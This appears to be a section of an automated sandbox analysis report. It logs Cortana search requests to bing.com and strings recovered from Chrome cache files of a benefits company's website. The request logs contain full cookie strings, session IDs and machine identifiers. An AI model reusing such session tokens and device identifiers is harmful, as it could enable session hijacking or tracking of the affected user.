SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powersh&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=7&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=7c9fde3d22a6481da34c89f0a5f7b62f HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241229x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!Cortana
                    Source: global trafficHTTP traffic detected: GET /rs/5V/1Vi/ortl,cc,nc/onra7PQl9o5bYT2lASI1BE4DDEs.css?or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powershe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=8&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=7c5908c3e3304b66be6d95f63909a1bb HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241229x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!Cortan
                    Source: global trafficHTTP traffic detected: GET /rs/6q/fy/nj/aABLNT_FV45QjYQfnRHrBCAk4GU.js?or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241235&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241235&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/hryYQjSSxM60EncpgnftvSF-LTo.js HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1749241235813&AC=4&CPH=23077e13; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=SRCHLANG=de&LUT=1749241235813&HV=1749241235&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1749241236556&AC=1&CPH=23077e13; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=SRCHLANG=de&LUT=1749241235813&HV=1749241235&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: chromecache_265.1.drString found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="6543a74692ff2d459ec1311f" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You&#x27;re successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
                    Source: chromecache_298.1.drString found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="65a95d045c1e15ba2a305fe5" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You&#x27;re successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
                    Source: chromecache_231.1.drString found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="65ab064ab380a3e2c2b752d4" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You&#x27;re successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
                    Source: chromecache_261.1.dr, chromecache_263.1.drString found in binary or memory: </svg></div></a></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
                    Source: chromecache_224.1.dr, chromecache_265.1.dr, chromecache_231.1.dr, chromecache_288.1.dr, chromecache_254.1.dr, chromecache_266.1.dr, chromecache_227.1.dr, chromecache_273.1.dr, chromecache_251.1.dr, chromecache_218.1.dr, chromecache_261.1.dr, chromecache_263.1.drString found in binary or memory: </svg></div></a><a aria-label="LinkedIn link" href="https://www.linkedin.com/company/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-linkedin" viewBox="0 0 16 16"> equals www.linkedin.com (Linkedin)
                    Source: chromecache_254.1.drString found in binary or memory: </svg></div></a><div class="faq_spacer is-small"></div></nav></div></div></div></div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
                    Source: chromecache_251.1.drString found in binary or memory: </svg></div></div></div></div></div></div></section><section class="section-features1"><div class="padding-global"><div class="container-xlarge"><div class="padding-section-xlarge"><div class="gap-vertical-medium"><div class="stats_header-wrapper"><div class="text-align-center text-color-black"><div class="gap-vertical-normal"><h2 class="heading-style-h3 text-weight-light">We&#x27;re building the future of benefits</h2><div class="max-width-custom align-center"><p>Say hello to the most innovative team in the consumer benefits industry.</p></div></div></div></div><div class="os_team-section"><div class="gap-vertical-normal is-os-team"><div class="text-align-center"><h3 class="heading-style-h4 text-color-black text-weight-normal">Executive team</h3></div><div class="team_collection-list-wrapper w-dyn-list"><div role="list" class="grid is-team-members is-top w-dyn-items"><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b10e11b402fcba62fbb340_brian_cosgray.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/cosgray/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Brian Cosgray</a><div class="team-member_role-max-width">Co-Founder, CEO, and Board Member</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
                    Source: chromecache_224.1.dr, chromecache_288.1.dr, chromecache_266.1.dr, chromecache_273.1.dr, chromecache_218.1.drString found in binary or memory: </svg></div></div></div></div><div class="related-content_card-label"><div fs-cmsfilter-field="type">Press Release</div></div></a></div></div></div><a fs-cmssort-reverse="true" fs-cmssort-element="trigger" fs-cmssort-field="date" href="#" class="fs_cmssort_button w-button">Button Text</a></div></div></div></div></section><section class="section-cta2"><div class="padding-global"><div class="container-large"><div class="padding-section-xlarge"><div class="text-align-center text-color-white"><div class="gap-vertical-normal is-align-center"><div class="max-width-custom7"><h2 class="heading-style-h3 text-weight-light">Ready to say goodbye to your pain points one by one?</h2></div><div class="max-width-custom align-center"><p>Schedule a demo today to see how Elevate can drive your business to new heights.</p></div><a href="/request-a-demo" class="button is-black w-button">Get a Demo</a></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
                    Source: chromecache_254.1.drString found in binary or memory: </svg></div></div></div><nav style="height:0px" class="faq_dropdown-list w-dropdown-list"><div class="faq_spacer"></div><div class="faq_paragraph text-style-muted w-richtext"><p>Stay ahead of the curve by <a href="/resource-center#newsletter-form">signing up for news and updates</a> from the experts at Elevate. Follow us on <a href="https://www.linkedin.com/company/elevatedotinc" target="_blank">LinkedIn</a> and <a href="https://twitter.com/elevatedotinc" target="_blank">X</a> for more updates.</p></div><a href="#" class="text-style-link-block text-color-captivate-blue is-faq w-inline-block w-condition-invisible"><div class="text-weight-medium">This is some text inside of a div block.</div><div class="icon-1x1-xsmall w-embed"><svg width="100%" height="100%" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
                    Source: chromecache_254.1.drString found in binary or memory: </svg></div></div></div><nav style="height:0px" class="faq_dropdown-list w-dropdown-list"><div class="faq_spacer"></div><div class="faq_paragraph text-style-muted w-richtext"><p>Stay ahead of the curve by <a href="/resource-center#newsletter-form">signing up for news and updates</a> from the experts at Elevate. Follow us on <a href="https://www.linkedin.com/company/elevatedotinc" target="_blank">LinkedIn</a> and <a href="https://twitter.com/elevatedotinc" target="_blank">X</a> for more updates.</p></div><a href="#" class="text-style-link-block text-color-captivate-blue is-faq w-inline-block w-condition-invisible"><div class="text-weight-medium">This is some text inside of a div block.</div><div class="icon-1x1-xsmall w-embed"><svg width="100%" height="100%" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.twitter.com (Twitter)
                    Source: chromecache_251.1.drString found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Alicia brings a deep background in consumer account marketing to Elevate. She is responsible for leading end-to-end marketing initiatives that promote corporate visibility and support business growth. Prior to this role, Alicia held marketing leadership roles at Optum and ConnectYourCare.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b10658f3e7ba1d16577ccd_amanda_richter.jpg" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/amanda-richter-4a22a5215/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Amanda Richter</a><div class="team-member_role-max-width">Head of Product</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
                    Source: chromecache_251.1.drString found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Brian is a visionary, leading Elevate in leveraging the latest financial technology that makes consumer directed benefits easier to understand and use for employees and their families. Prior to founding Elevate, Brian led the team at Businessolver that developed and launched a proprietary, in-house consumer directed benefits solution for Fortune 100, state government, and mid-sized business clients.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b0328612c05e43c82dd6e2_brian_strom.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/bstrom/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Brian Strom</a><div class="team-member_role-max-width">Co-Founder, CTO, and Board Member</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
                    Source: chromecache_251.1.drString found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Keith is a seasoned Employee Benefits and Financial Services executive who combines his extensive experience in solution selling, partnerships, and business development with a genuine passion for creating visionary strategies and delivering successful outcomes. Keith previously led sales teams at Businessolver, WageWorks, and DoubleNet Pay.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/662bc7bb42f8bf4f9b69b810_Untitled%20design-5.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/aliciamainoberg/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Alicia Oberg</a><div class="team-member_role-max-width">SVP, Marketing</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
